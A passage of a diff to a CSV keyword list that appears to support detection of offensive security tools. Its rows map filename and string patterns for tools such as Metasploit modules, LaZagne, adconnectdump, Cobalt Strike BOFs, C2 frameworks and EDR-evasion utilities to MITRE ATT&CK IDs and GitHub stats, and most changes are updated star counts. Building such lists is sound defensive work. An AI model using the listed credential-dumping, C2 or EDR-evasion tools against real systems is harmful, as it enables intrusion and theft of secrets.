T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*adsearch* --domain-admins*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*adsearch.exe*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*ADSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADSearch.sln*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*ADSearch\ADSearch.cs*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*adsearch-master.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*ADSyncDecrypt.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*ADSyncGather.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*ADSyncQuery*ADSync.mdf*.txt*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*Advanced-SQL-Injection-Cheatsheet*","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2242","569","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z" +"*advantech_iview_networkservlet_cmd_inject.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*adxcsouf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*ADZero.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","1","20","6","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z" -"*aem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*AES_cryptor.py *","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*AesEncryptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*aem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AES_cryptor.py *","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*AesEncryptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*ag_load_script*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*agent*DNSCommunication.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" @@ -7136,20 +7280,20 @@ "*Aggressor-Scripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*AhMyth-Android-RAT*","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","3977","1663","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z" +"*AhMyth-Android-RAT*","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","3978","1661","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z" "*ahsten.run \*powershell.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Airbash*","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/tehw0lf/airbash","1","0","N/A","N/A","4","340","64","2021-10-26T09:47:34Z","2018-04-18T23:50:15Z" -"*Aircrack-ng*","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4234","838","2023-09-30T22:40:36Z","2018-03-10T17:11:11Z" +"*Aircrack-ng*","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4238","838","2023-09-30T22:40:36Z","2018-03-10T17:11:11Z" "*aircrack-ng*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Airgeddon*","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","5428","1104","2023-10-02T21:32:56Z","2016-03-18T10:34:56Z" +"*Airgeddon*","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","5430","1104","2023-10-02T21:32:56Z","2016-03-18T10:34:56Z" "*airman604/splunk_whisperer*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*airmon-ng*","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. It may also be used to kill network managers or go back from monitor mode to managed mode","T1018 - T1040","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*airodump-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*airpwn-ng*","offensive_tool_keyword","airpwn-ng","We force the targets browser to do what we want","T1562 - T1564 - T1565 - T1566 - T1567 - T1573","TA0005 - TA0007 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","1","23","11","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z" -"*aix2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*aix2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aix2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aix2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*ajpc500/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*AlanFramework.git*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*Alcatraz.sln*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" @@ -7158,16 +7302,16 @@ "*Alcatraz-master.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" -"*AlessandroZ/LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*AlessandroZ/LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*alexa-top-20000-sites.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*al-khaser*","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","10","5073","1120","2023-09-29T17:54:38Z","2015-11-12T18:35:16Z" -"*All EDR drivers were successfully removed from Kernel callbacks!*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*All_SubdomainTOP_Seclist.txt*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" -"*AllowDelegationUsers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*AllowDelegationUsers_samaccountnames_only.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*All EDR drivers were successfully removed from Kernel callbacks!*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*All_SubdomainTOP_Seclist.txt*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*AllowDelegationUsers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*AllowDelegationUsers_samaccountnames_only.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*almandin/krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" -"*ALPC-TaskSched-LPE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ALPC-TaskSched-LPE.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ALPC-TaskSched-LPE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 